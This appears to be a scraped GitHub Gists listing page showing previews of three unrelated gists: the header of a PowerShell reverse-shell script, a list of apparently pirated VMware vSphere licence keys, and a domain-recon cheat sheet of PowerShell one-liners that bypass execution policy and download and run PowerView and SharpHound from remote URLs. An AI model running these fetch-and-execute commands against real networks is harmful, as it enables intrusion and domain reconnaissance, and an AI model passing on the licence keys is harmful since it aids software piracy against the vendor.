nobodyatall648
qtc-de
/ DynWin32-ReverseShell.ps1
Last active
December 10, 2024 20:13
PowerShell reverse shell that uses dynamically resolved Win32 API functions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls. | |
| The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess. | |
| Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions | |
| from ws2_32.dll. | |
| This script should be used for educational purposes only (and maybe while playing CTF :D). | |
| It was only tested on Windows 10 (x64) and is probably not stable or portable. It's only | |
| purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as |
CHSuworatrai
/ VMware vSphere 6.x Licence Keys
Created
April 8, 2021 09:20
— forked from DVSB/VMware vSphere 6.x Licence Keys
VMware vSphere 6 and 7 Licence Keys
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| VMware vSphere 6 Enterprise Plus | |
| 1C20K-4Z214-H84U1-T92EP-92838 | |
| 1A2JU-DEH12-48460-CT956-AC84D | |
| MC28R-4L006-484D1-VV8NK-C7R58 | |
| 5C6TK-4C39J-48E00-PH0XH-828Q4 | |
| 4A4X0-69HE3-M8548-6L1QK-1Y240 | |
| VMware vSphere with Operations Management 6 Enterprise | |
| 4Y2NU-4Z301-085C8-M18EP-2K8M8 | |
| 1Y48R-0EJEK-084R0-GK9XM-23R52 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |